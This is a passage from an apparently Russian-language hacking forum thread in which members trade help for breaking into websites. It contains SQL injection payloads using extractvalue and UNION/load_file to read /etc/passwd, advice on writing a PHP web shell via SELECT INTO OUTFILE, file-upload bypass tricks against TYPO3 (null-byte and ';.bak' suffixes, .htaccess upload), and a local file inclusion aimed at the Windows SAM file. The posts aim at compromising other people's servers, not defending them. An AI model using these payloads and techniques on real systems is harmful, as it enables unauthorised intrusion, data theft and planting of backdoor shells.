Старый 09.03.2016, 03:46   #3521
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Вы сами себе противоречите - говорите, что слеши использовать нельзя, а в векторе чтения их приводите.

Проблемы эксплуатации SQL-инъекций в REQUEST_URI вытекают не из-за невозможности использования спецсимволов в данном параметре, а из-за их поиска при реализации его распознавания в конкретном приложении. Постарайтесь привести полный список запрещенных символов, и мы попробуем вам помочь.
Благодарю, со слешем ошибся, кодируется \, а / работает нормально, так-же кодируется пробел, остальные символы вроде работают.
Делаю такой запрос:
http://test/'or(extractvalue(1,concat(0x3b,(select/**/count(*)/**/from/**/base.table/**/into/**/outfile/**/'/home/path/fo/script.php'))))and'#
Вываливается ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into/**/outfile/**/'/home/path/fo/script.php'))))and'%2'' at line 1
При этом запрос:
http://test/'or(extractvalue(1,concat(0x3b,(select/**/count(*)/**/from/**/base.table))))and'#
Отрабатывает нормально, не могу понять с чем связано. И одинарные кавычки нужные для into outfile так же работают, и ограничение на длину запроса тоже отсутствует.
Molofya вне форума   Ответить с цитированием
Старый 09.03.2016, 16:53   #3522
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Нарушен синтаксис INTO.

Цитата:
An INTO clause should not be used in a nested SELECT because such a SELECT must return its result to the outer context.
Нужно добить запрос, а потом в конце отправить в файл.
crlf вне форума   Ответить с цитированием
Старый 09.03.2016, 22:04   #3523
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от Molofya Посмотреть сообщение
Благодарю, со слешем ошибся, кодируется \, а / работает нормально, так-же кодируется пробел, остальные символы вроде работают.
Делаю такой запрос:
http://test/'or(extractvalue(1,concat(0x3b,(select/**/count(*)/**/from/**/base.table/**/into/**/outfile/**/'/home/path/fo/script.php'))))and'#
Вываливается ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into/**/outfile/**/'/home/path/fo/script.php'))))and'%2'' at line 1
При этом запрос:
http://test/'or(extractvalue(1,concat(0x3b,(select/**/count(*)/**/from/**/base.table))))and'#
Отрабатывает нормально, не могу понять с чем связано. И одинарные кавычки нужные для into outfile так же работают, и ограничение на длину запроса тоже отсутствует.
Препятствий эксплуатации уязвимости в вашем случае нет, но запрос вы строите некорректно. Error-based - метод вывода информации, не более того.

Для заливки легче достроить основной SELECT запрос, и уже в нем применить INTO [OUTFILE | DUMPFILE], как и советует crlf. Часто применяют конструкции FIELDS TERMINATED BY, OPTIONALLY ENCLOSED BY, LINES TERMINATED BY. Они тоже позволяют вставить свой текст в записываемый файл. Если не можете достроить основной запрос - посмотрите его вид в таблице information_schema.processlist.

Ссылки по теме:
  1. http://dev.mysql.com/doc/refman/5.7/en/select-into.html
  2. https://rdot.org/forum/showpost.php?...7&postcount=12
  3. https://rdot.org/forum/showpost.php?p=114&postcount=1 (пункт file_priv)
  4. https://rdot.org/forum/showpost.php?p=8510&postcount=2 (пример использования INTO в подзапросе, но работает не везде)
Не получиться - сбросьте сюда строку запроса и версию СУБД, а также желательно информацию о типе клиента (может раскрываться в ошибке).
__________________
На правах рекламы.

Последний раз редактировалось NameSpace; 09.03.2016 в 22:15..
NameSpace вне форума   Ответить с цитированием
Старый 12.03.2016, 09:51   #3524
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Molofya, %09 не работает как вариант для пробела?
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Старый 14.03.2016, 03:03   #3525
Pazuzu
 
Регистрация: 08.11.2013
Сообщений: 1
Репутация: 0
По умолчанию

Уважаемые участники форума. Может кто подбросит идею, как залить шелл на typo3 ver. 4.5
Пробовал с помощью заливки расширения - директория typo3conf/ext/ закрыта на создание новых папок. Скачал уже установленное расширение в формате t3x, засунул в него шелл, залил - изменений не произошло.
Через файл манагер не дает заливать расширения php, phtml и иже с ними. Файлы типа shell.php%00 заливаются, но при открытии выдают 400 Bad Request. shell.php;.bak выдает Access denied. В какую сторону еще можно копнуть? Сервер на nginx

Последний раз редактировалось Pazuzu; 14.03.2016 в 10:59..
Pazuzu вне форума   Ответить с цитированием
Старый 14.03.2016, 21:20   #3526
Dr.Strangelove
 
Аватар для Dr.Strangelove
 
Регистрация: 05.03.2016
Сообщений: 10
Репутация: 0
По умолчанию

Цитата:
Сервер на nginx
Только nginx? Апач есть нет?

Цитата:
В какую сторону еще можно копнуть?
Если есть апач, то как вариант можно попробовать залить .htaccess
Dr.Strangelove вне форума   Ответить с цитированием
Старый 16.03.2016, 14:09   #3527
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Какая версия сервера? Какая OS?

https://rdot.org/forum/showthread.php?t=2949
__________________
На правах рекламы.
NameSpace вне форума   Ответить с цитированием
Старый 31.03.2016, 21:38   #3528
snakes
 
Регистрация: 22.11.2014
Сообщений: 10
Репутация: 0
По умолчанию

Есть root, знаю путь, пытаюсь залить шелл через select into outfile
мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

Подскажите что можно еще придумать?
snakes вне форума   Ответить с цитированием
Старый 01.04.2016, 19:16   #3529
smirk
 
Регистрация: 30.01.2013
Сообщений: 15
Репутация: 0
По умолчанию

Цитата:
Сообщение от snakes Посмотреть сообщение
Есть root, знаю путь, пытаюсь залить шелл через select into outfile
мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

Подскажите что можно еще придумать?
Нет прав на запись в данный каталог. Выход - искать другую папку куда можно будет записать свой файл.
smirk вне форума   Ответить с цитированием
Старый 03.04.2016, 10:30   #3530
illado
 
Регистрация: 25.03.2016
Сообщений: 1
Репутация: 0
По умолчанию

Всем привет, окончательно запутался, все сканеры говорят что сайт IIS 6, хотя через load_file (http://site.com/m/news.php?id=-1+union+select+1,2,3,load_file(''),5,6,7,8,9,10,11 ,12--) читаются разные linux конфиги (/etc/passwd;/etc/httpd/conf/httpd.conf), но в то же время нашёл LFI который выводит следующую ошибку:

Код:
PHP Warning:  include(c:\inetpub\wwwroot/content/departments/../../../../../../../../../../windows/repair/sam) [<a href='function.include'>function.include</a>]: failed to open stream: Permission denied in C:\Inetpub\wwwroot\m\departments\index.php on line 109
PHP Warning:  include() [<a href='function.include'>function.include</a>]: Failed opening 'c:\inetpub\wwwroot/content/departments/../../../../../../../../../../windows/repair/sam' for inclusion (include_path='.;C:\php5\pear') in C:\Inetpub\wwwroot\m\departments\index.php on line 109
Пробовал, читается файл hosts, win.ini, system.ini и тд. Что это может быть??
(5.1.48-enterprise-gpl-advanced)
illado вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot